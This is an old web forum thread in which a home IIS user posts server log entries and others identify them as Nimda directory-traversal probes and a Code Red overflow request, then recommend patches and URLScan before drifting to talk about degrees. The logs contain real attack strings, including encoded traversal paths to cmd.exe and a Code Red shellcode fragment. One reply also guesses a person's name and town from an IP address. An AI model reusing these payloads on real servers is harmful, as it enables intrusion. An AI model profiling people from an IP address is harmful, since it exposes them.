whoisurdaddy 0 Posted November 13, 2001 Hello, I was just looking through my web server's log file and I found this (this is only part of the whole log file): 206.166.234.62, -, 11/12/2001, 12:48:17, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 72, 3387, 404, 3, GET, /scripts/root.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:19, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 70, 3387, 404, 3, GET, /MSADC/root.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:20, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 80, 3387, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:22, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 80, 3387, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:23, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 96, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:25, W3SVC1, HEADHUNTER, 206.228.118.165, 10, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:25, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 117, 3387, 404, 3, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:27, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 145, 3387, 404, 3, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:29, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:34, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:35, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:41, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:42, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 98, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:46, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 96, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:48, W3SVC1, HEADHUNTER, 206.228.118.165, 10, 100, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 206.166.234.62, -, 11/12/2001, 12:48:49, W3SVC1, HEADHUNTER, 206.228.118.165, 10, 96, 3387, 404, 3, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 216.179.62.9, -, 11/12/2001, 16:58:32, W3SVC1, HEADHUNTER, 206.228.118.165, 50, 34, 3387, 404, 3, GET, /scripts/root.exe, -, 211.44.231.41, -, 11/12/2001, 20:26:40, W3SVC1, HEADHUNTER, 206.228.118.165, 1973, 4039, 171, 200, 0, GET, /default.ida, NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a, I see a bunch of "N" and the part with "/scripts/root.exe, /c+dir..." kinda worries me. I don't know what it does but I don't think it is good. My guess is that it is accessing my root directory of the C drive?? I am using IIS 5.1 that came with WinXP Professional. Can someone explain to me what is going on from the log info above? Sorry, if this post is too long. Share this post Link to post
Palos 0 Posted November 13, 2001 What kind of log format are you using for IIS? - IIS Standard - IIS Standard with UserID - IIS Standard with SessionID - IIS Standard with User&SessionID Or extended with all the options above.... Actually on a closer look I think it's the Standard IIS format. The format is the following: hostname, auth user, date, time, service, server name, virtual host, server response, bytes received, bytes sent, status, window status, method, resource, query string This corresponds to: 206.166.234.62, -, 11/12/2001, 12:48:17, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 72, 3387, 404, 3, GET, /scripts/root.exe, /c+dir, W3SVC is the WWW service, so you can say for sure it was sent to the WWW server, not the FTP or other. Before you try to figure out what happened, do some more research on the incoming IP. Also try to run the exploits on your own, see how deep can you get on your own machine. I doubt IIS permits remote execution of shell commands via WWW, lol. Check your permissions as well. No more ideas, maybe someone else is brighter. ---------------------- On second thoughts, by looking at the "method" field, I think is self-explanatory. The attacker tried to execute a cmd.exe by giving an URL, and got the 404 error all the way, except for one case when IIS returned a 500 error; 404 means page not found I hope that was it, couldn't bet on it though Share this post Link to post
Fekalen 0 Posted November 13, 2001 If it was an attempted hack this guy ain't to bright. He has his own homepage: 206.228.118.165 = http://t118165.turbonet.com/ And I would guess his name is Kenneth Tun He lives in Moscow (not the russian capital),Idaho - USA Here's a mail adress to report his abuse to his ISP if you want: abuse@sprint.net Share this post Link to post
clutch 1 Posted November 13, 2001 Don't worry about it. That's a Nimda infected box attacking, and that's its signature. Are you patched up for it? Here's some links about ways to secure IIS, and a link to getting URLScan from MS. It will generate 404 errors when someone makes a request that breaks the predetermined rule set. Here is a general checklist: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/iis/tips/iis5chk.asp Here is a link for resources on securing IIS: http://support.microsoft.com/support/kb/articles/q282/0/60.asp And here is a link for the new Security Tool Kit from MS: http://support.microsoft.com/support/kb/articles/Q309/5/36.ASP This is a link for URLScan (my fav) that is briefly mentioned in a couple of the other links: http://support.microsoft.com/support/kb/articles/q307/6/08.asp You will also see references to the IISLockdown Tool, which is pretty strict and works by locking various ISAPI filters and fixing permissions on system directories in case someone can traverse directories (which won't happen anyway if you are using URLScan and it's configured properly). The High Security Template is nice too, and protected many IIS boxes from infection. You can also subscribe to the security release email list at this link to get all the latest info on patches and such: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/notify.asp I have been getting these for quite a while. Here's a page I wrote that queries my logs (I have IIS setup to log to a SQL DB) www.driventechnologies.com/odbclog and type "cmd.exe" without the quotes into the target box. The date range defaults to the current day, but the logs go back to August 1, 2001. Share this post Link to post
whoisurdaddy 0 Posted November 13, 2001 Thank you all for replying. Fekalen, that is my server. 206.228.118.165 is my comp's IP and I am also running a web server on it just for messing around. I am just wondering because I thought I pretty much secured my computer. I have Zonealarm Pro firewall and all guest accounts are disabled and stuff... ---- Palos, I am using Microsoft IIS Log file format. There are only 3 available for me to choose from: Microsoft IIS Log file format, NCSA Common log file and W3C Extended Log file format. ---- Clutch, I don't think mine is patched up for Nimda. I ran Windows Update two days ago and I downloaded a lot of patch from Microsoft Windows UPdate site but I don't think that Windows Update patched up my computer for Nimda. Share this post Link to post
Palos 0 Posted November 13, 2001 Muhuhahaha, Fekalen...good job man. Clutch sez that it looks like a Nimda zombie, he could be right. If the remote machine tried to execute a shell prompt, that doesn't mean he necessarly DID it. Share this post Link to post
clutch 1 Posted November 13, 2001 To flush the normal Code Red worm, you could simply reboot and then apply the patch (with the server offline so it wouldn't get infected again). That would take care of the issue. Some Nimda and Code Red II boxes had nice backdoors left open for intrusions later on. On the MS security site, there is a tool for ridding the system of the worm that stays behind, but there could have been other damage. On your logs, I see many "404" errors, and the lone "500" error (could be for security, invalid execution, etc.) which is a good sign. It shows that your server wasn't able to execute the requests. Now, here is a normal attack cycle from a Nimda box: 24.60.219.128 - 11/13/2001 11:44:44 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:42 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:40 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:29 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:27 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:25 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:23 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:20 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:18 AM W3SVC3 SERVER-1 192.168.1.200 404 - /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:16 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:14 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:12 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%255c../winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:10 AM W3SVC3 SERVER-1 192.168.1.200 404 - /d/winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir - Info 24.60.219.128 - 11/13/2001 11:44:03 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/root.exe?/c+dir - Look familiar? Here's the break down on yours: 206.166.234.62 was an automated Nimda attack; 216.179.62.9 was a solo direct attack (but a 404 error-"page not found", so no biggie) 211.44.231.41 old Code Red attack (uses "N" for the flood, an "X" is Code Red II) So, you will probably see a lot of these, and you will see them for some time to come. Just patch up, and move on. Share this post Link to post
whoisurdaddy 0 Posted November 13, 2001 Clutch, thx for the info. I am still learning about this security stuff. Too bad, in school they don't teach me any stuff like this...may be next semester they might teach me about network security in one of my MIS classes. Share this post Link to post
clutch 1 Posted November 13, 2001 Unfortunately, I wouldn't count in it. Most MIS grads that I have worked with have learned very little about systems architecture and application in their MIS courses, let alone anything about security. A good deal of the MIS courses I read through seem more focused on floor/personnel management rather than working directly on the information systems themselves. You might want to take some technical courses in security and network architecture as an elective if possible. Where are you going to school at? Share this post Link to post
Palos 0 Posted November 14, 2001 MIS courses left me with a bad taste in my mouth during my college years Bla,bla,bla...uninterresting stuff, if you know what I mean. Share this post Link to post
whoisurdaddy 0 Posted November 14, 2001 I am a Senior from WSU (Washington State University). Share this post Link to post
Palos 0 Posted November 14, 2001 Dude, listen to me...enjoy your last moments in college as if there was no tomorrow. Real life SUCKS (at least nowadays if you're a fresh CS graduate looking for a job). PS - and your intelligence level is pretty much average, i.e ur not a genius on 2 legs, having NSA and NASA knocking at your door, begging you to take their job offers PPS - By CS graduate I mean Computer Science, NOT Counter-Strike Share this post Link to post
RandyC 0 Posted November 14, 2001 I've learnet loads about system architecture during my 3 years so far at Uni. Especially in my Networking Principles and Operating Systems modules last year and this year. I guess maybe UK Bsc (Hons) Computer Science degrees go into more depth than some of the states degrees despite being only 3 year courses. I agree working life does suck so i'm doing another year in Uni to concentrate on my final year project(which I could of done this year) and get a CCNA. Have to get a job aswell though as I have to do all of these on a part time basis Share this post Link to post
clutch 1 Posted November 14, 2001 That sounds like a normal Computer Science degree, but we were talking about a Management of Information Systems (MIS) degree. Most schools get so hung up on the "Management" portion that the graduates are almost helpless in "the real world". As for graduating and getting out in the world, making large amounts of money for doing something you like has its perks too, just remember that. Share this post Link to post
RandyC 0 Posted November 14, 2001 Ahh didnt read that bit probably because i've never come across a MIS course before. Just wondering if anyone here has done a CCNA course and am wondering how realistically usefull is it in the job world. I always get a biased view from my lecturers as our CS department is partially funded by Cisco. Thanks RandyC Share this post Link to post
waddy 0 Posted November 17, 2001 Im currently doing CCNA (semester 3) and am on my 2ND year of my Computer science degree. Computer science degree = a load of crap CCNA = damn handy stuff now why is say a degree is rubbish is you dont learn anything for the real world ... its all out of date... you walk out of there 3 years behind the real world where i work part time ..people walk in with degrees ... thinking they are quite good .. usually last a week ....its not their fault, but the real world is quite different from uni.... Basically if you want to learn computing ,, do it at home ... all you need is the internet, 1/2 dozen puters, range of operating systems and some books. I learnt more playing around at home in a few months than college taught me in 2 years...... The only reason im doing the degree as it == £££ for that lousy piece of paper ......and i can catch up on my sleep during the lectures Without good practical skills, the real world doesnt want to know you .... Share this post Link to post
RandyC 0 Posted November 18, 2001 Some good points made epecially: Quote: I'd guess that many educational institutions are not implementing cutting edge fibre optic networks & Cisco tools and WANS of MASSIVE multicampus scale the students design themselves hands on! I know I certainly don’t get anyway near enough work on optic networks. I learn the theory but that’s about it. As for being out of date well that’s inevitable considering how fast the computer industry develops as a whole. Although as AlecStaar states you learn the 'fundamental principles' which provide you with a grounding to learn any newly developed ideas/methods. I treat my degree as a stepping stone it will help me get to positions otherwise not available to me if I went straight in after leaving college. In several years time most of the 'new' material taught to me during the degree will be old hat and maybe superseded by something else but it does tell employers that you are 1. Prepared to learn new material 2. You can hold and regurgitate that material 3. Proves you are fairly intelligent and finally its useful CV padding I could have started to do my CCNA during my second year but I had already taken the module that starts the CCNA (Semester 1 & 2) the previous year before my Uni started to do the CCNA course. O well it seems worthwhile and I enjoy my current network modules so I’ll probably go for it next year part time. Wish me luck RandyC Share this post Link to post